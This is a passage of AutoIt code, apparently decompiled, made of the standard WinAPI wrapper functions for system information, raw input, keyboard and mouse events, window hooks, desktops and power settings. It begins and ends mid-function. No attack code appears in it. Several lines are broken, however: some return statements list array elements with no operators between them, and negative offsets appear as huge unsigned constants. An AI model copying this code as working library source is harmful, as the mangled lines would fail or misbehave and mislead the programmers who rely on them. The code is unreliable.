, "GetModuleHandleExW" , "dword" , $IFLAGS , $STYPEOFMODULE , $SMODULE , "ptr*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_GETMUILANGUAGE () LOCAL $ARET = DLLCALL ("comctl32.dll" , "word" , "GetMUILanguage" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETPERFORMANCEINFO () LOCAL $TPI = DLLSTRUCTCREATE ("dword;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;dword;dword;dword" ) LOCAL $ARET = DLLCALL (@SYSTEMDIR & "\psapi.dll" , "bool" , "GetPerformanceInfo" , "struct*" , $TPI , "dword" , DLLSTRUCTGETSIZE ($TPI ) ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [13 ] FOR $I = 0 TO 12 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TPI , $I + 2 ) NEXT FOR $I = 0 TO 8 $ARESULT [$I ] *= $ARESULT [9 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETPROCADDRESS ($HMODULE , $VNAME ) LOCAL $STYPE = "str" IF ISNUMBER ($VNAME ) THEN $STYPE = "word" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "GetProcAddress" , "handle" , $HMODULE , $STYPE , $VNAME ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETPHYSICALLYINSTALLEDSYSTEMMEMORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetPhysicallyInstalledSystemMemory" , "uint64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETPROCESSSHUTDOWNPARAMETERS () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetProcessShutdownParameters" , "dword*" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN SETEXTENDED (NUMBER (NOT $ARET [2 ] ) , $ARET [1 ] ) ENDFUNC FUNC _WINAPI_GETPROCESSWINDOWSTATION () LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetProcessWindowStation" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETPWRCAPABILITIES () IF NOT __DLL ("powrprof.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TSPC = DLLSTRUCTCREATE ("byte[18];byte[3];byte;byte[8];byte[2];ulong[6];ulong[5]" ) LOCAL $ARET = DLLCALL ("powrprof.dll" , "boolean" , "GetPwrCapabilities" , "struct*" , $TSPC ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [25 ] FOR $I = 0 TO 17 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 1 , $I + 1 ) NEXT $ARESULT [18 ] = DLLSTRUCTGETDATA ($TSPC , 3 ) FOR $I = 19 TO 20 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 5 , $I + 4294967278 ) NEXT FOR $I = 21 TO 24 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 7 , $I + 4294967276 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETRAWINPUTBUFFER ($PBUFFER , $ILENGTH ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputBuffer" , "struct*" , $PBUFFER , "uint*" , $ILENGTH , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [1 ] ) THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETRAWINPUTBUFFERLENGTH () LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputBuffer" , "ptr" , 0 , "uint*" , 0 , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN $ARET [2 ] * 8 ENDFUNC FUNC _WINAPI_GETRAWINPUTDATA ($HRAWINPUT , $PBUFFER , $ILENGTH , $IFLAG ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputData" , "handle" , $HRAWINPUT , "uint" , $IFLAG , "struct*" , $PBUFFER , "uint*" , $ILENGTH , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN ($ARET [3 ] $ARET [0 ] $ARET [4 ] ) ENDFUNC FUNC _WINAPI_GETRAWINPUTDEVICEINFO ($HDEVICE , $PBUFFER , $ILENGTH , $IFLAG ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceInfoW" , "handle" , $HDEVICE , "uint" , $IFLAG , "struct*" , $PBUFFER , "uint*" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN ($ARET [3 ] $ARET [0 ] $ARET [4 ] ) ENDFUNC FUNC _WINAPI_GETREGISTEREDRAWINPUTDEVICES ($PBUFFER , $ILENGTH ) LOCAL $ILENGTHRAW = DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICE ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRegisteredRawInputDevices" , "struct*" , $PBUFFER , "uint*" , FLOOR ($ILENGTH / $ILENGTHRAW ) , "uint" , $ILENGTHRAW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () IF $ILASTERROR = 122 THEN RETURN SETEXTENDED ($ILASTERROR , $ARET [2 ] * $ILENGTHRAW ) RETURN SETERROR (10 , $ILASTERROR , 0 ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSTARTUPINFO () LOCAL $TSI = DLLSTRUCTCREATE ($TAGSTARTUPINFO ) DLLCALL ("kernel32.dll" , "none" , "GetStartupInfoW" , "struct*" , $TSI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TSI ENDFUNC FUNC _WINAPI_GETSYSTEMDEPPOLICY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint" , "GetSystemDEPPolicy" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMINFO () LOCAL $SPROC IF _WINAPI_ISWOW64PROCESS () THEN $SPROC = "GetNativeSystemInfo" ELSE $SPROC = "GetSystemInfo" ENDIF LOCAL CONST $TAGSYSTEMINFO = "struct;word ProcessorArchitecture;word Reserved; endstruct;dword PageSize;" & "ptr MinimumApplicationAddress;ptr MaximumApplicationAddress;dword_ptr ActiveProcessorMask;dword NumberOfProcessors;" & "dword ProcessorType;dword AllocationGranularity;word ProcessorLevel;word ProcessorRevision" LOCAL $TSYSTEMINFO = DLLSTRUCTCREATE ($TAGSYSTEMINFO ) DLLCALL ("kernel32.dll" , "none" , $SPROC , "struct*" , $TSYSTEMINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARESULT [10 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSYSTEMINFO , 1 ) FOR $I = 1 TO 9 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSYSTEMINFO , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMPOWERSTATUS () LOCAL $TAGSYSTEM_POWER_STATUS = "byte ACLineStatus;byte BatteryFlag;byte BatteryLifePercent;byte Reserved1;" & "int BatteryLifeTime;int BatteryFullLifeTime" LOCAL $TSYSTEM_POWER_STATUS = DLLSTRUCTCREATE ($TAGSYSTEM_POWER_STATUS ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetSystemPowerStatus" , "struct*" , $TSYSTEM_POWER_STATUS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [5 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 1 ) $ARESULT [1 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 2 ) $ARESULT [2 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 3 ) $ARESULT [3 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 5 ) $ARESULT [4 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 6 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMTIMES () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetSystemTimes" , "uint64*" , 0 , "uint64*" , 0 , "uint64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [3 ] FOR $I = 0 TO 2 $ARESULT [$I ] = $ARET [$I + 1 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMWOW64DIRECTORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint" , "GetSystemWow64DirectoryW" , "wstr" , "" , "uint" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , _WINAPI_GETLASTERROR () , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETTICKCOUNT () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetTickCount" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTICKCOUNT64 () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint64" , "GetTickCount64" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETUSEROBJECTINFORMATION ($HOBJECT , $IINDEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetUserObjectInformationW" , "handle" , $HOBJECT , "int" , $IINDEX , "ptr" , 0 , "dword" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TDATA SWITCH $IINDEX CASE 1 $TDATA = DLLSTRUCTCREATE ($TAGUSEROBJECTFLAGS ) CASE 5 , 6 $TDATA = DLLSTRUCTCREATE ("uint" ) CASE 2 , 3 $TDATA = DLLSTRUCTCREATE ("wchar[" & $ARET [5 ] & "]" ) CASE 4 $TDATA = DLLSTRUCTCREATE ("byte[" & $ARET [5 ] & "]" ) CASE ELSE RETURN SETERROR (20 , 0 , 0 ) ENDSWITCH $ARET = DLLCALL ("user32.dll" , "bool" , "GetUserObjectInformationW" , "handle" , $HOBJECT , "int" , $IINDEX , "struct*" , $TDATA , "dword" , DLLSTRUCTGETSIZE ($TDATA ) , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) SWITCH $IINDEX CASE 1 , 4 RETURN $TDATA CASE ELSE RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDSWITCH ENDFUNC FUNC _WINAPI_GETVERSION () RETURN NUMBER (BITAND (BITSHIFT ($__WINVER , 8 ) , 255 ) & "." & BITAND ($__WINVER , 255 ) , $NUMBER_DOUBLE ) ENDFUNC FUNC _WINAPI_GETVERSIONEX () LOCAL $TOSVERSIONINFOEX = DLLSTRUCTCREATE ($TAGOSVERSIONINFOEX ) DLLSTRUCTSETDATA ($TOSVERSIONINFOEX , "OSVersionInfoSize" , DLLSTRUCTGETSIZE ($TOSVERSIONINFOEX ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetVersionExW" , "struct*" , $TOSVERSIONINFOEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TOSVERSIONINFOEX ENDFUNC FUNC _WINAPI_GETWORKAREA () LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SystemParametersInfo" , "uint" , 48 , "uint" , 0 , "struct*" , $TRECT , "uint" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_INITMUILANGUAGE ($ILANGUAGE ) DLLCALL ("comctl32.dll" , "none" , "InitMUILanguage" , "word" , $ILANGUAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_ISLOADKBLAYOUT ($ILANGUAGE ) LOCAL $ALAYOUT = _WINAPI_GETKEYBOARDLAYOUTLIST () IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) FOR $I = 1 TO $ALAYOUT [0 ] IF $ALAYOUT [$I ] = $ILANGUAGE THEN RETURN TRUE NEXT RETURN FALSE ENDFUNC FUNC _WINAPI_ISPROCESSORFEATUREPRESENT ($IFEATURE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsProcessorFeaturePresent" , "dword" , $IFEATURE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWENABLED ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsWindowEnabled" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_KEYBD_EVENT ($VKEY , $IFLAGS , $ISCANCODE = 0 , $IEXTRAINFO = 0 ) DLLCALL ("user32.dll" , "none" , "keybd_event" , "byte" , $VKEY , "byte" , $ISCANCODE , "dword" , $IFLAGS , "ulong_ptr" , $IEXTRAINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_LOADKEYBOARDLAYOUT ($ILANGUAGE , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "LoadKeyboardLayoutW" , "wstr" , HEX ($ILANGUAGE , 8 ) , "uint" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_LOCKWORKSTATION () LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "LockWorkStation" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MAPVIRTUALKEY ($ICODE , $ITYPE , $HLOCALE = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "INT" , "MapVirtualKeyExW" , "uint" , $ICODE , "uint" , $ITYPE , "uint_ptr" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MOUSE_EVENT ($IFLAGS , $IX = 0 , $IY = 0 , $IDATA = 0 , $IEXTRAINFO = 0 ) DLLCALL ("user32.dll" , "none" , "mouse_event" , "dword" , $IFLAGS , "dword" , $IX , "dword" , $IY , "dword" , $IDATA , "ulong_ptr" , $IEXTRAINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED ) ENDFUNC FUNC _WINAPI_OPENDESKTOP ($SNAME , $IACCESS = 0 , $IFLAGS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenDesktopW" , "wstr" , $SNAME , "dword" , $IFLAGS , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENINPUTDESKTOP ($IACCESS = 0 , $IFLAGS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenInputDesktop" , "dword" , $IFLAGS , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENWINDOWSTATION ($SNAME , $IACCESS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenWindowStationW" , "wstr" , $SNAME , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_QUERYPERFORMANCECOUNTER () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "QueryPerformanceCounter" , "int64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_QUERYPERFORMANCEFREQUENCY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "QueryPerformanceFrequency" , "int64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_REGISTERHOTKEY ($HWND , $IID , $IMODIFIERS , $VKEY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterHotKey" , "hwnd" , $HWND , "int" , $IID , "uint" , $IMODIFIERS , "uint" , $VKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERPOWERSETTINGNOTIFICATION ($HWND , $SGUID ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("user32.dll" , "handle" , "RegisterPowerSettingNotification" , "handle" , $HWND , "struct*" , $TGUID , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERRAWINPUTDEVICES ($PADEVICE , $ICOUNT = 1 ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterRawInputDevices" , "struct*" , $PADEVICE , "uint" , $ICOUNT , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICE ) ) * $ICOUNT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RELEASECAPTURE () LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ReleaseCapture" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REMOVECLIPBOARDFORMATLISTENER ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RemoveClipboardFormatListener" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETACTIVEWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SetActiveWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETCAPTURE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetCapture" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETDEFAULTPRINTER ($SPRINTER ) LOCAL $ARESULT = DLLCALL ("winspool.drv" , "bool" , "SetDefaultPrinterW" , "wstr" , $SPRINTER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETDLLDIRECTORY ($SDIRPATH = DEFAULT ) LOCAL $STYPEOFPATH = "wstr" IF $SDIRPATH = DEFAULT THEN $STYPEOFPATH = "ptr" $SDIRPATH = 0 ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetDllDirectoryW" , $STYPEOFPATH , $SDIRPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETKEYBOARDLAYOUT ($HWND , $ILANGUAGE , $IFLAGS = 0 ) IF NOT _WINAPI_ISWINDOW ($HWND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $HLOCALE = 0 IF $ILANGUAGE THEN $HLOCALE = _WINAPI_LOADKEYBOARDLAYOUT ($ILANGUAGE ) IF NOT $HLOCALE THEN RETURN SETERROR (10 , 0 , 0 ) ENDIF LOCAL CONST $WM_INPUTLANGCHANGEREQUEST = 80 DLLCALL ("user32.dll" , "none" , "SendMessage" , "hwnd" , $HWND , "uint" , $WM_INPUTLANGCHANGEREQUEST , "uint" , $IFLAGS , "uint_ptr" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SETKEYBOARDSTATE (BYREF $TSTATE ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SetKeyboardState" , "struct*" , $TSTATE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETPROCESSSHUTDOWNPARAMETERS ($ILEVEL , $BDIALOG = FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetProcessShutdownParameters" , "dword" , $ILEVEL , "dword" , NOT $BDIALOG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETPROCESSWINDOWSTATION ($HSTATION ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetProcessWindowStation" , "handle" , $HSTATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETUSEROBJECTINFORMATION ($HOBJECT , $IINDEX , BYREF $TDATA ) IF $IINDEX <> 1 THEN RETURN SETERROR (10 , 0 , FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetUserObjectInformationW" , "handle" , $HOBJECT , "int" , 1 , "struct*" , $TDATA , "dword" , DLLSTRUCTGETSIZE ($TDATA ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWSHOOKEX ($IHOOK , $PPROC , $HDLL , $ITHREADID = 0 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "SetWindowsHookEx" , "int" , $IHOOK , "ptr" , $PPROC , "handle" , $HDLL , "dword" , $ITHREADID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINEVENTHOOK ($IEVENTMIN , $IEVENTMAX , $PEVENTPROC , $IPID = 0 , $ITHREADID = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "SetWinEventHook" , "uint" , $IEVENTMIN , "uint" , $IEVENTMAX , "ptr" , 0 , "ptr" , $PEVENTPROC , "dword" , $IPID , "dword" , $ITHREADID , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONCREATE ($HWND , $STEXT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonCreate" , "hwnd" , $HWND , "wstr" , $STEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONDESTROY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonDestroy" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONQUERY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonQuery" , "hwnd" , $HWND , "wstr" , "" , "dword*" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SWITCHDESKTOP ($HDESKTOP ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SwitchDesktop" , "handle" , $HDESKTOP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SYSTEMPARAMETERSINFO ($IACTION , $IPARAM = 0 , $VPARAM = 0 , $IWININI = 0 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SystemParametersInfoW" , "uint" , $IACTION , "uint" , $IPARAM , "struct*" , $VPARAM , "uint" , $IWININI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_TRACKMOUSEEVENT ($HWND , $IFLAGS , $ITIME = + 4294967295 ) LOCAL $TTME = DLLSTRUCTCREATE ("dword;dword;hwnd;dword" ) DLLSTRUCTSETDATA ($TTME , 1 , DLLSTRUCTGETSIZE ($TTME ) ) DLLSTRUCTSETDATA ($TTME , 2 , $IFLAGS ) DLLSTRUCTSETDATA ($TTME , 3 , $HWND ) DLLSTRUCTSETDATA ($TTME , 4 , $ITIME ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "TrackMouseEvent" , "struct*" , $TTME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINDOWSHOOKEX ($HHOOK ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UnhookWindowsHookEx" , "handle" , $HHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINEVENT ($HEVENTHOOK ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnhookWinEvent" , "handle" , $HEVENTHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNLOADKEYBOARDLAYOUT ($HLOCALE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnloadKeyboardLayout" , "handle" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERHOTKEY ($HWND , $IID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterHotKey" , "hwnd" , $HWND , "int" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERPOWERSETTINGNOTIFICATION ($HNOTIFY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterPowerSettingNotification" , "handle" , $HNOTIFY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC __ENUMPAGEFILESPROC ($ISIZE , $PINFO , $PFILE ) LOCAL 